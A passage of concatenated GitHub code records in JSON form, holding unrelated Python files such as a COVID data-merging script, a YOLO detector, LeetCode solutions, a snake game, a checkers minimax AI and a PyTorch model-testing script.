new_cols=[\"Datum\",\"Viral_Pot_Pess\",\"Dunkelziffer_Pess\",\"V24\",\"Value_Infectious_Pess\",\"V45\",\"Free_Viral_Pess\",\"Geimpfte_Pess\",\"Viralität_in_Proz_Pess\",\"Viralität_pro_X_Pess\"]\n new_names_map = {chbasepess5.columns[i]:new_cols[i] for i in range(len(new_cols))}\n chbasepess5.rename(new_names_map, axis=1, inplace=True)\n\n chbasepess5.Viralität_pro_X_Pess=chbasepess5.Viralität_pro_X_Pess/25\n chbasepess5.Viralität_in_Proz_Pess=chbasepess5.Viralität_in_Proz_Pess*100\n chbasepess5['Menschen_mit_Viruskontakt_Pess']=chbasepess5.V45*chbasepess5.V24*100\n\n chbasepess5.Geimpfte_Pess=chbasepess5.Geimpfte_Pess.fillna(0)\n\n print(chbasepess5.size)\n chbasepess5.dropna(subset=['Datum'],inplace=True)\n chbasepess5.dropna(subset=['Viral_Pot_Pess'],inplace=True)\n print(chbasepess5.size)\n\n chbasepess5=chbasepess5[[\"Datum\",\"Viral_Pot_Pess\",\"Value_Infectious_Pess\",\"Free_Viral_Pess\",\"Viralität_in_Proz_Pess\",\"Viralität_pro_X_Pess\",\"Dunkelziffer_Pess\",\"Menschen_mit_Viruskontakt_Pess\",\"Geimpfte_Pess\"]]\n\n merged = pd.merge(chbase5,chbaseplus5, on=\"Datum\")\n merged2 = pd.merge(chbaseopt5,chbasepess5, on=\"Datum\")\n merged3 = pd.merge(merged,merged2, on=\"Datum\")\n\n print(merged3.Dunkelziffer)\n print(merged3.Value_Infectious)\n\n #pd.set_option('float_format', lambda x: '%.10f' % x)\n #pd.set_option('display.float_format', lambda x: '%.10f' % x)\n merged3.to_csv(\"app/output/data.csv\",index=False)#, float_format='%.20f')#,quoting=csv.QUOTE_MINIMAL)\n\n print(merged3)\n print(merged3.Value_Infectious.dtypes)\n\n f = open(\"app/output/lastupdate.csv\", \"w\")\n date_string=date.today().strftime(\"%Y-%m-%d\")\n f.write(\"lastupdate\\n\"+date_string)\n f.close()","repo_name":"smartrestart/smartrestart_glitch_letterbox","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26543181100","text":"import torch\n\n\nclass Detector:\n def __init__(self, net_path):\n self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n self.net = torch.load(net_path, map_location=self.device.type)\n self.net.eval()\n\n def detect(self, x_in, thresh, anchors):\n out13, out26 = self.net(x_in.to(self.device))\n\n # keep boxes over thresh\n idxs26, vectors26 = self.boxFilter(out26, thresh)\n idxs13, vectors13 = self.boxFilter(out13, thresh)\n\n # calculate the real position\n boxes26 = self.boxReturn(idxs26, vectors26, 16, anchors[26]).to(self.device)\n boxes13 = self.boxReturn(idxs13, vectors13, 32, anchors[13]).to(self.device)\n\n return torch.cat([boxes26, boxes13], dim=0)\n\n def boxFilter(self, output, thresh):\n output = output.permute(0, 2, 3, 1)\n output = output.reshape(output.size()[0], output.size()[1],\n output.size()[2], 3, -1) # N, H, W, 3, 5 (iou, cx, cy, w, h, cls)\n\n mask = output[..., 0] > thresh\n idxs = mask.nonzero()\n vectors = output[mask]\n return idxs, vectors\n\n def boxReturn(self, idxs, vectors, scaleRate, anchors):\n if vectors.size()[0] == 0:\n return torch.tensor([])\n\n # vectors [iou, cx_offset, cy_offset, w_offset, h_offset]\n anchors = torch.tensor(anchors, dtype=torch.float32).to(self.device)\n batch, idx_cy, idx_cx, boxType = idxs[:, 0], idxs[:, 1], idxs[:, 2], idxs[:, 3] # [N, H, W, 3(Box Type), 10]\n cx, cy = (idx_cx.float() + vectors[:, 1]) * scaleRate, (idx_cy.float() + vectors[:, 2]) * scaleRate\n w, h = anchors[boxType, 0] * torch.exp(vectors[:, 3]), anchors[boxType, 1] * torch.exp(vectors[:, 4])\n confi = vectors[..., 0]\n cls = vectors[..., 5:].T\n try:\n return torch.stack([batch.float(), confi, cx, cy, w, h, *cls], dim=1)\n except Exception:\n return torch.stack([batch.float(), confi, cx, cy, w, h], dim=1)\n","repo_name":"EinKung/YoloTiny","sub_path":"yolo_tiny/detector.py","file_name":"detector.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17225876521","text":"# You are given an array of points in the X-Y plane points where points[i] = [xi, yi].\n\n# Return the minimum area of a rectangle formed from these points, with sides parallel to the X and Y axes. If there is not any such rectangle, return 0.\n\n# Example 1:\n\n# Input: points = [[1,1],[1,3],[3,1],[3,3],[2,2]]\n# Output: 4\n# Example 2:\n\n# Input: points = [[1,1],[1,3],[3,1],[3,3],[4,1],[4,3]]\n# Output: 2\n\nclass Solution:\n def minAreaRect(self, points: List[List[int]]) -> int:\n n = len(points)\n points.sort(key=lambda x: (x[0], x[1]))\n # sorted(word_dict.items(), key=lambda x: (-x[1], x[0]))\n possible_areas = []\n for p1 in range(n):\n for p2 in range(p1 + 1, n):\n for p3 in range(p2 + 1, n):\n for p4 in range(p3 + 1, n):\n point1 = points[p1]\n point2 = points[p2]\n point3 = points[p3]\n point4 = points[p4]\n if point1[0] == point2[0] and point1[1] == point3[1] and point3[0] == point4[0] and point2[1] == point4[1]:\n if (point1,point2,point3,point4) not in possible_areas:\n possible_areas.append((point1,point2,point3,point4))\n \n result = float('inf')\n for item in possible_areas:\n area = abs(item[0][0] - item[2][0]) * abs(item[0][1] - item[1][1])\n if area < result:\n result = area\n if result == float('inf'):\n result = 0\n return result\n\n def minAreaRectLeetCode(self, points):\n seen = set()\n res = float('inf')\n for x1, y1 in points:\n for x2, y2 in seen:\n if (x1, y2) in seen and (x2, y1) in seen:\n area = abs(x1 - x2) * abs(y1 - y2)\n if area and area < res:\n res = area\n seen.add((x1, y1))\n return res if res < float('inf') else 0","repo_name":"angelricardoh/LeetCode-Python","sub_path":"Others/Minimum Area Rectangle.py","file_name":"Minimum Area Rectangle.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26716949846","text":"from turtle import Turtle\n\nUP = 90\nDOWN = 270\nRIGHT = 0\nLEFT = 180\n\n\nclass Snake(Turtle):\n\n def __init__(self):\n super().__init__(visible=False)\n self.color(\"white\")\n self.penup()\n self.segments = []\n self.create_snake()\n self.head = self.segments[0]\n\n def create_snake(self):\n x = 0\n for i in range(3):\n square = Turtle(\"square\")\n square.color(\"white\")\n square.penup()\n square.speed(\"fastest\")\n square.goto(x, 0)\n x -= 20\n self.segments.append(square)\n\n def move(self):\n for seg_num in range(len(self.segments) - 1, 0, -1):\n new_x = self.segments[seg_num - 1].xcor()\n new_y = self.segments[seg_num - 1].ycor()\n self.segments[seg_num].goto(new_x, new_y)\n self.head.forward(21)\n\n def add_piece(self):\n square = Turtle(\"square\")\n square.color(\"white\")\n square.penup()\n i = len(self.segments)\n last_segment = self.segments[i - 1]\n x = last_segment.xcor()\n y = last_segment.ycor()\n heading = last_segment.heading()\n square.goto(x, y)\n square.setheading(heading)\n self.segments.append(square)\n\n def up(self):\n if self.head.heading() != DOWN:\n self.head.setheading(UP)\n\n def down(self):\n if self.head.heading() != UP:\n self.head.setheading(DOWN)\n\n def mv_left(self):\n if self.head.heading() != RIGHT:\n self.head.setheading(LEFT)\n\n def mv_right(self):\n if self.head.heading() != LEFT:\n self.head.setheading(RIGHT)\n\n def reset(self):\n for seg in self.segments:\n seg.hideturtle()\n self.segments.clear()\n self.create_snake()\n self.head = self.segments[0]\n\n def wall_collision(self, screen):\n if self.head.xcor() >= screen.window_width() / 2 or self.head.xcor() <= -screen.window_width() / 2:\n return True\n elif self.head.ycor() >= screen.window_height() / 2 or self.head.ycor() <= -screen.window_height() / 2:\n return True\n else:\n return False\n\n def snake_collision(self):\n for seg_num in range(len(self.segments) - 1, 0, -1):\n if self.segments[0].position() == self.segments[seg_num].position():\n return True\n return False\n","repo_name":"Wojtke7/100-Days-of-code-Python","sub_path":"Day 20, 21 snake game/snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10207362676","text":"import json\r\nimport logging\r\nimport base64\r\nfrom handler import Handler\r\n\r\n'''\r\n------ PROTOCOL FORMAT ------\r\nString terbagi menjadi 2 bagian yang dipisahkan oleh spasi\r\n------ FITUR ------\r\n1. Mengunggah File (Upload)\r\n Untuk mengunggah/upload file ke folder 'dir'\r\n Request : upload\r\n Parameter : upload namafile\r\n Respon : jika berhasil, maka akan mengeluarkan tulisan namafile Successfully uploaded\r\n jika gagal, mengeluarkan tulisan Error\r\n2. Mengunduh File (Download)\r\n Untuk mengunduh/download file dari dalam folder 'dir'\r\n Request : download\r\n Parameter: namafile yg ingin di download dari folder dir\r\n Response: file yang terdownload akan muncul di direktori script berada\r\n3. Melihat Isi File (List File)\r\n Untuk melihat list file yang berada dalam folder 'dir'\r\n Request : list\r\n Parameter : -\r\n Response: menampilkan nama-nama file dalam folder 'dir'\r\nJika command tidak dikenali akan merespon dengan ERRCMD\r\n'''\r\n\r\np = Handler()\r\n\r\nclass FileMachine:\r\n def proses(self,string_to_process):\r\n s = string_to_process\r\n cstring = s.split(\" \")\r\n try:\r\n command = cstring[0].strip()\r\n if (command=='upload'):\r\n logging.warning(\"upload\")\r\n source = cstring[1].strip()\r\n dest = cstring[2].strip()\r\n p.upload_file(source,dest.encode())\r\n return \"Ok, File Uploaded\"\r\n\r\n elif (command=='download'):\r\n logging.warning(\"download\")\r\n source = cstring[1].strip()\r\n res = p.download_file(source)\r\n return res[0]\r\n\r\n elif (command=='list'):\r\n logging.warning(\"list\")\r\n res = p.list_file()\r\n dict = {\"status\":\"success\",\"data\": res}\r\n return json.dumps(dict)\r\n else:\r\n return \"ERRCMD\"\r\n\r\n except:\r\n return \"ERROR\"\r\n\r\nif __name__=='__main__':\r\n pm = FileMachine()\r\n run = pm.proses(\"list\")\r\n print(run)","repo_name":"tbirkham/progjar-b-its-2020","sub_path":"Tugas 4/file_machine.py","file_name":"file_machine.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18150994547","text":"import sys\nsys.stdin = open('input.txt', \"r\")\n\nN = int(sys.stdin.readline().rstrip())\n\n\n# 먼져 방향 그래프를 이어준다 (트리)\ndirect = [[]for _ in range(N+1)]\nfor _ in range(N-1):\n A, B = map(int, sys.stdin.readline().rstrip().split(' '))\n direct[A].append(B)\n direct[B].append(A)\n\n\nDP = [[0, 0] for _ in range(N+1)] # 켜졌을경우, 꺼졌을경우\n# 켜졌을경우 하위노드들의 최솟값을 가져온다.\n# 꺼졌을경우 하위노드들이 켜졌을 경우를 가져온다.\ncheck = [False]*(N+1)\n# 정점 아무거나 하나를 선택한뒤 내려간다.\n\n\ndef DFS(now):\n check[now] = True\n DP[now][0] = 1\n for next in direct[now]:\n if check[next] == True:\n continue\n # 켜졌을경우\n DFS(next)\n DP[now][0] += min(DP[next])\n # 꺼졌을경우\n DP[now][1] += DP[next][0]\n\n\nDFS(1)\nprint(min(DP[1]))\n","repo_name":"aver1001/Problem-Solving","sub_path":"풀이 완료/2533/acmicpc.py","file_name":"acmicpc.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33949197637","text":"from random import randint\nfrom BoardClasses import Move\nfrom BoardClasses import Board\nfrom collections import defaultdict\n#The following part should be completed by students.\n#Students can modify anything except the class name and exisiting functions and varibles.\n\nclass Node():\n def __init__(self, color: int, move: Move =None):\n self.color: int = color\n self.move: Move = move\n self.priorityScore: int = 0\n self.children: [Node] = []\n\n\n\n\n# def color(color):\n# return\n\n\nclass StudentAI():\n\n def __init__(self,col,row,p):\n self.col = col\n self.row = row\n self.p = p\n self.board = Board(col,row,p)\n self.board.initialize_game()\n self.color = ''\n self.opponent = {1:2,2:1}\n self.color = 2\n\n\n\n def get_move(self,move):\n \"\"\"\n receiving the opponent move and producing the move.\n just one simple move\n \"\"\"\n if len(move) != 0:\n self.board.make_move(move,self.opponent[self.color])\n else:\n self.color = 1\n\n # produce a random move\n \"\"\"\n moves = self.board.get_all_possible_moves(self.color)\n index = randint(0,len(moves)-1)\n inner_index = randint(0,len(moves[index])-1)\n move = moves[index][inner_index]\n self.board.make_move(move,self.color)\n \"\"\"\n #moves = self.board.get_all_possible_moves(self.color) # list of Move objects\n move = self.minmaxSearch()\n self.board.make_move(move,self.color)\n return move\n\n\n # evaluate the state in my position\n def evaluate_score(self, myTurn: bool = True):\n point = 0\n for i in range(self.row):\n for j in range(self.col):\n checker = self.board.board[i][j]\n if checker.color == 'W':\n point -= 1\n if checker.is_king:\n point -= 1\n elif checker.color == 'B':\n point += 1\n if checker.is_king:\n point += 1\n\n\n if myTurn:\n return point\n else:\n return -point\n\n\n # create the search tree for minmax\n # def create_tree(self, root, depth=1):\n # if depth == 0:\n # return root\n # else:\n # move_available = self.board.get_all_possible_moves(self.opponent(self.color))\n # for i in range(len(move_available)):\n # for j in range(len(move_available[i])):\n # return root\n\n\n\n\n ## the min-max search\n \"\"\"def min_max(self, children: [Node], color):\n determineMinMax = lambda color, priorityMapColor: max if color == priorityMapColor else min\n priority_map = defaultdict(list)\n \"\"\"\n '''\n def AlphaBetaSearch(self) -> Move:\n _, move = self.maxValue(1)\n return move\n\n def maxValue(self, depth: int = 0,a: int = float('-inf'),b: int = float('inf')) -> (int, Move):\n\n if self.board.is_win(self.color) != 0 or depth == 0:\n #print(self.evaluate_score())\n return (self.evaluate_score(), [])\n\n for checkMoves in self.board.get_all_possible_moves(self.color):\n for move in checkMoves:\n self.board.make_move(move, self.color)\n currScore, _ = self.minValue(depth - 1,a,b)\n self.board.undo()\n if currScore > b:\n return float('inf')\n a = max(a,currScore)\n return a,\n\n\n def minValue(self, depth: int = 0,a: int = float('-inf'),b: int = float('inf')) -> (int, Move):\n if self.board.is_win(self.color) != 0 or depth == 0:\n #print(self.evaluate_score())\n return (self.evaluate_score(), [])\n\n for checkMoves in self.board.get_all_possible_moves(self.color):\n for move in checkMoves:\n self.board.make_move(move, self.color)\n currScore, _ = self.maxValue(depth - 1)\n self.board.undo()\n if currScore > bestScore:\n bestScore, bestMove = currScore, move\n return (bestScore, bestMove)\n '''\n\n def minmaxSearch(self) -> Move:\n _, move = self.maxValue(7)\n\n # move = self.greedy(self.board.get_all_possible_moves(self.color), max)[1]\n\n return move\n\n\n def maxValue(self, depth: int = 0, myTurn: bool = True) -> (int, Move):\n color = self.color if myTurn else self.opponent[self.color]\n if self.board.is_win(color) != 0:\n return (self.evaluate_score(myTurn), self.board.get_all_possible_moves(color)[0][0] if len(self.board.get_all_possible_moves(color)) != 0 else None)\n if depth == 1:\n bestScore = -100000000\n bestMove = None\n for moves in self.board.get_all_possible_moves(color):\n for move in moves:\n self.board.make_move(move, color)\n currScore = self.evaluate_score(myTurn)\n self.board.undo()\n if currScore > bestScore:\n bestScore, bestMove = currScore, move\n\n # if not hasattr(bestMove, \"seq\"):\n # return (bestScore, Move([]))\n\n return (bestScore, bestMove)\n\n bestScore = -100000000\n bestMove = None\n\n if len(self.board.get_all_possible_moves(color)) != 0:\n bestMove = self.board.get_all_possible_moves(color)[-1][-1]\n\n for moves in self.board.get_all_possible_moves(color):\n for move in moves:\n self.board.make_move(move, color)\n currScore, remaining_moves = self.maxValue(depth - 1, not myTurn)\n self.board.undo()\n if currScore > bestScore:\n bestScore, bestMove = currScore, move\n\n # if not hasattr(bestMove, \"seq\"):\n # return (bestScore, Move([]))\n\n return (bestScore, bestMove)\n\n\n def minValue(self, depth: int = 0) -> (int, Move):\n if self.board.is_win(self.opponent) != 0:\n return (self.evaluate_score(), Move([]))\n if depth == 0:\n return (self.evaluate_score(), Move([]))\n\n bestScore = 100000000\n bestMove = Move([])\n\n for moves in self.board.get_all_possible_moves(self.opponent):\n for move in moves:\n self.board.make_move(move, self.opponent)\n currScore, remaining_moves = self.maxValue(depth - 1)\n self.board.undo()\n if currScore < bestScore:\n bestScore, bestMove = currScore, move\n\n\n # if not hasattr(bestMove, \"seq\"):\n # return (bestScore, Move([]))\n\n return (bestScore, bestMove)\n\n\n\n\n ## greedy algorithm\n def greedy(self, moves, func: \"function min or max\") -> (int, Move):\n \"\"\"\n give the children node and the color of checker.\n :param moves: the all possible moves from the get_all_possible_moves()\n :return the optimal moves by greedy algorithm\n \"\"\"\n point_list = defaultdict(list)\n for i in moves:\n for j in i:\n self.board.make_move(j,self.color)\n point_list[self.evaluate_score()].append(j)\n self.board.undo()\n\n return (func(point_list.keys()), point_list[func(point_list.keys())][0])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"deadpan926/checkers-python-ver2-1","sub_path":"StudentAI.py","file_name":"StudentAI.py","file_ext":"py","file_size_in_byte":7425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23744394938","text":"from SetLinkedList import*\n \nclass HashSet:\n \n def __init__(self, n_buckets):\n self.num_buckets = n_buckets\n self.buckets = []\n self.length = 0\n \n for i in range(self.num_buckets):\n self.buckets.append(linked_list())\n \n def __contains__(self, obj):\n bucket = hash(obj) % self.num_buckets\n return obj in self.buckets[bucket]\n \n \n def add(self,obj):\n bucket = hash(obj) % self.num_buckets\n if not obj in self:\n self.buckets[bucket].add_first(obj)\n self.length += 1\n \n def remove(self, obj):\n if obj in self:\n bucket = hash(obj) % self.num_buckets\n self.buckets[bucket].remove(obj)\n self.length -=1\n else:\n raise KeyError(\"Item {} not in set!\".format(key))\n \n \n def __len__(self):\n return self.length\n \n def keys(self):\n keys = []\n for i in range(self.num_buckets):\n cursor = self.buckets[i].head\n while cursor:\n keys.append(cursor.key)\n cursor = cursor.next\n return keys\n \n def __str__(self):\n s = \"\"\n for i in range(self.num_buckets):\n s += self.buckets[i].__str__() \n s += \"\\n\"\n \n return s\n \n \n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n ","repo_name":"Duntron1000/CS271","sub_path":"Jupyter/hw1-hash/HashSet.py","file_name":"HashSet.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32746832321","text":"import pygame\nfrom pygame.locals import (\n RLEACCEL\n)\nfrom settings import (\n SCREEN_WIDTH,\n SCREEN_HEIGHT,\n SPRITE_SCALE\n)\nimport random\nfrom beam import Beam\n\nclass Enemy(pygame.sprite.Sprite):\n def __init__(self, sheet):\n super(Enemy, self).__init__()\n # self.surf = pygame.Surface((20, 10))\n # self.surf.fill((255, 255, 255))\n self.surf = sheet.get_image_name(\"enemyRed1.png\", SPRITE_SCALE)\n self.beam = sheet.get_image_name(\"fire00.png\", SPRITE_SCALE)\n self.surf.set_colorkey((255, 255, 255), RLEACCEL)\n self.rect = self.surf.get_rect(\n center=(\n random.randint(0, SCREEN_WIDTH),\n -random.randint(0, 200)\n )\n )\n self.speed = random.randint(5, 20)\n\n def fire(self):\n can_fire = random.randint(0, 100) > 80\n if can_fire:\n return Beam(self.beam, self.rect.centerx, self.rect.centery)\n\n def update(self):\n self.rect.move_ip(0, self.speed)\n if self.rect.bottom > SCREEN_HEIGHT:\n #sprite group에서 제거\n self.kill()","repo_name":"netscout/python-projects","sub_path":"pygame/firstgame/enemy.py","file_name":"enemy.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23583987541","text":"#!/usr/local/bin/python3\n\nimport logging\n\n\ndef solve(problem):\n N, R, O, Y, G, B, V = problem\n from collections import Counter\n\n opposite_colors = {\n \"R\" : [\"Y\", \"G\", \"B\"],\n \"O\" : [\"G\", \"B\", \"V\"],\n \"Y\" : [\"B\", \"V\", \"R\"],\n \"G\" : [\"V\", \"R\", \"O\"],\n \"B\" : [\"R\", \"O\", \"Y\"],\n \"V\" : [\"O\", \"Y\", \"G\"],\n }\n\n def deficit(color, counter):\n return sum(counter[c] for c in opposite_colors[color]) - counter[color]\n\n def extend(solution, node):\n if node is None:\n counter = Counter({\n \"R\" : R,\n \"O\" : O,\n \"Y\" : Y,\n \"G\" : G,\n \"B\" : B,\n \"V\" : V,\n })\n colors = [c for c in counter.keys() if deficit(c, counter) >= 0]\n else:\n c, counter = node\n colors = opposite_colors[c]\n options = []\n for color in colors:\n if counter[color] == 0:\n continue\n counter_ = Counter(counter)\n counter_[color] -= 1\n option = (color, counter_)\n options.append(option)\n options.sort(key=lambda option: counter[option[0]])\n return iter(options)\n\n def present(solution):\n return \"\".join(color for (color, counter) in solution)\n\n def accept(solution, node):\n return len(solution) == N\n\n def reject(solution, node):\n assert not node is None\n if len(solution) == N:\n c0, _ = solution[0]\n cN, _ = solution[-1]\n return not c0 in opposite_colors[cN]\n c, counter = node\n return deficit(c, counter) < 0\n\n def backtrack():\n solution = []\n options = [extend(solution, None)]\n while True:\n try:\n node = next(options[-1])\n solution.append(node)\n if reject(solution, node):\n solution.pop()\n continue\n if accept(solution, node):\n yield present(solution)\n it = extend(solution, node)\n if not it is None:\n options.append(it)\n else:\n solution.pop()\n except StopIteration:\n options.pop()\n if not options:\n return\n solution.pop()\n\n for s in backtrack():\n return s\n return \"IMPOSSIBLE\"\n\ndef parse_problems():\n import fileinput\n fin = fileinput.input()\n\n T = int(next(fin))\n for _ in range(T):\n yield tuple(map(int, next(fin).split()))\n\ndef main():\n import time\n logging.basicConfig(level=logging.INFO, format=\"%(message)s\")\n\n t0 = time.time()\n logging.info(\"Starting...\")\n for i, p in enumerate(parse_problems()):\n ans = solve(p)\n logging.info(\"Solved #%d\", i + 1)\n print(\"Case #{}: {}\".format(i + 1, ans))\n logging.info(\"Finished in %.2f s\", time.time() - t0)\n\nif __name__ == '__main__':\n main()\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_207/667.py","file_name":"667.py","file_ext":"py","file_size_in_byte":3026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32981023657","text":"# Implement strStr().\n#\n# Return the index of the first occurrence of needle in haystack, or -1 if needle is not part of haystack.\n#\n# Example 1:\n#\n# Input: haystack = \"hello\", needle = \"ll\"\n# Output: 2\n# Example 2:\n#\n# Input: haystack = \"aaaaa\", needle = \"bba\"\n# Output: -1\n# Clarification:\n#\n# What should we return when needle is an empty string? This is a great question to ask during an interview.\n#\n# For the purpose of this problem, we will return 0 when needle is an empty string. This is consistent to C's strstr() and Java's indexOf().\n\n\nclass Solution(object):\n def strStr(self, haystack, needle):\n \"\"\"\n :type haystack: str\n :type needle: str\n :rtype: int\n \"\"\"\n # brute force TLE\n # if not haystack or not needle:\n # return -1\n # for i in range(0, len(haystack) - len(needle)):\n # for j in range(0, len(needle)):\n # if needle[j] == haystack[i + j] and j == len(needle) - 1:\n # return i\n # if needle[j] != haystack[i + j]:\n # break\n # return -1\n\n # KMP\n if not haystack:\n return -1\n if not needle:\n return 0\n nex = self.getNext(needle)\n i, j = 0, 0\n while i < len(haystack) and j < len(needle):\n if j == -1 or needle[j] == haystack[i]:\n j += 1\n i += 1\n else:\n j = nex[j]\n if j == len(needle):\n return i - j\n else:\n return -1\n\n def getNext(self, needle):\n nex = [0] * len(needle)\n nex[0] = -1\n i, j = 0, -1\n while i < len(needle) - 1:\n if j == -1 or needle[i] == needle[j]:\n j += 1\n i += 1\n nex[i] = j\n else:\n j = nex[j]\n return nex\n\n\ns = Solution()\nprint(s.strStr(\"BBC ABCDAB ABCDABCDABDE\",\n \"\"))\n","repo_name":"yshshadow/Leetcode","sub_path":"1-50/28.py","file_name":"28.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73291901953","text":"import sys\n\nIDBFile = open(sys.argv[1], \"r\")\nConfigFile = open(sys.argv[2], \"r\")\n\nFIN = open(sys.argv[3], \"r\")\nFOUT = open(\"Out\", \"w\")\n\nBarcodeOrder = 0\nBarcodeSet = {}\nwhile True:\n line = ConfigFile.readline().strip()\n if not line:\n break\n\n line = line.split()[0]\n if not BarcodeSet.get(line):\n BarcodeSet.update({line: BarcodeOrder})\n BarcodeOrder = BarcodeOrder + 1\n\nBarcodeOrderIDB = {}\nwhile True:\n line = IDBFile.readline().strip()\n if not line:\n break\n\n line = line.split()\n BarcodeOrderInIDB = int(line[0])\n CellInIDB = \"CELL_\" + line[1]\n if not BarcodeOrderIDB.get(BarcodeOrderInIDB):\n BarcodeOrderIDB.update({BarcodeOrderInIDB: CellInIDB})\n\nwhile True:\n line = FIN.readline().strip()\n if not line:\n break\n\n line = line.split()[0]\n if not BarcodeSet.get(line):\n print(\"Barcode \" + line + \" not presented in Config file.\")\n LineOut = \"-\\n\"\n else:\n Order = BarcodeSet.get(line)\n if not BarcodeOrderIDB.get(Order):\n print(\"Barcode \" + line + \" not presented in IDB file.\")\n LineOut = \"-\\n\"\n else:\n Cell = BarcodeOrderIDB.get(Order)\n LineOut = Cell + \"\\n\"\n FOUT.write(LineOut)\n\n","repo_name":"ZhengmzLab/ScSmOP","sub_path":"PythonScript/ConvertBarcodeToCell.py","file_name":"ConvertBarcodeToCell.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"15549258757","text":"import os\nimport torch \nfrom torch import nn\nfrom torchvision import datasets, transforms, models\nfrom timeit import default_timer as timer\nimport pandas as pd\nimport numpy as np\nimport time\n\nroot = os.getcwd()\n\n# Gid's\n# root = \"/Users/zhiiikaiii/Documents/GitHub/cancer\"\n\nmetric_csv = True\ndef test(test_dir,bs,do,pth_path, verbose = False):\n test_transforms = transforms.Compose([transforms.Resize(224),\n transforms.ToTensor()])\n test_data = datasets.ImageFolder(test_dir, transform=test_transforms)\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n testloader = torch.utils.data.DataLoader(test_data, batch_size=bs,shuffle=True)\n model = models.densenet161(pretrained=True)\n model.classifier = nn.Sequential(nn.Linear(2208, 2208),\n nn.ReLU(inplace=True),\n nn.Dropout(do),\n nn.Linear(2208, 1024),\n nn.ReLU(inplace=True),\n nn.Dropout(do),\n nn.Linear(1024, 2),\n nn.LogSoftmax(dim=1))\n model.load_state_dict(torch.load(pth_path))\n model.to(device)\n model.eval()\n\n TP,FN,FP,TN = 0,0,0,0\n count = 0\n start = timer()\n for inputs, labels in testloader:\n inputs, labels = inputs.to(device), labels.to(device)\n outputs = model.forward(inputs)\n ps = torch.exp(outputs)\n top_p, top_class = ps.topk(1, dim=1)\n confusion_vector = top_class.flatten() / labels\n # - 1 and 1 (True Positive) 1\n # - 1 and 0 (False Positive) inf\n # - 0 and 0 (True Negative) nan\n # - 0 and 1 (False Negative) 0\n TP += torch.sum(confusion_vector == 1).item()\n FP += torch.sum(confusion_vector == float('inf')).item()\n TN += torch.sum(torch.isnan(confusion_vector)).item()\n FN += torch.sum(confusion_vector == 0).item()\n if verbose:\n if count%1000 == 0:\n end = timer()\n print(count)\n print(\"time: \", (end - start)/60, \"minutes\")\n start = end\n count +=1\n return TP,TN,FP,FN\n \n\ndef metrics_calulation (TP,TN,FP,FN):\n accuracy = (TP+TN)/(TP+TN+FP+FN)\n sensitivity = TP/(TP+FN)\n specificity = TN/(TN+FP)\n precision = TP/(TP+FP)\n F1score = TP/(TP+0.5*(FP+FN))\n assert (accuracy >= 0 and accuracy <= 1), \"Accuracy must be greater than 0 and smaller than 1\"\n assert (sensitivity >= 0 and sensitivity <= 1), \"Sensitivity must be greater than 0 and smaller than 1\"\n assert (specificity >= 0 and specificity <= 1), \"Specificity must be greater than 0 and smaller than 1\"\n assert (precision >= 0 and precision <= 1), \"Precision must be greater than 0 and smaller than 1\"\n assert (F1score >= 0 and F1score <= 1), \"F1-score must be greater than 0 and smaller than 1\"\n\n return accuracy, sensitivity, specificity, precision, F1score\n\ntest_dir = root + \"/../data/Dataset120507/test\"\n\n#Gideon's mac testing\n# test_dir= \"/Users/zhiiikaiii/Documents/GitHub/cancer/tiny/test\"\n\nmodel_names = os.listdir(root+ \"/../models\")\naccuracies,sensitivities,specificities,precisions,F1scores = [],[],[],[],[]\nfor pth in model_names:\n if pth[-4:] == \".pth\":\n print(\"testing : \"+ pth)\n bs = 1\n do = 0.1\n assert (bs > 0), \"Batch size cannot be < 1\"\n assert (do >= 0 and do <= 1), \"Dropout rate must be 0 >= do < 1\"\n pth_path = root + \"/../models/\"+pth\n TP,TN,FP,FN = test(test_dir,bs,do,pth_path,verbose= False)\n accuracy, sensitivity, specificity, precision, F1score = metrics_calulation(TP,TN,FP,FN)\n accuracies.append(accuracy)\n sensitivities.append(sensitivity)\n specificities.append(specificity)\n precisions.append(precision)\n F1scores.append(F1score)\n\n# cerate a \"metrics\" folder in root directory and within it \"testing\"\nif (metric_csv):\n metric_output = '/metrics/testing/'\n isExist = os.path.exists(root + metric_output)\n if not isExist:\n os.makedirs(root + metric_output)\n df = pd.DataFrame([accuracies,sensitivities,specificities,precisions,F1scores]).T\n df.columns = [\"accuracies\",\"sensitivities\",\"specificities\",\"precisions\",\"F1scores\"]\n df.insert(loc=0, column='epoch', value=np.arange(1,len(df)+1))\n now = 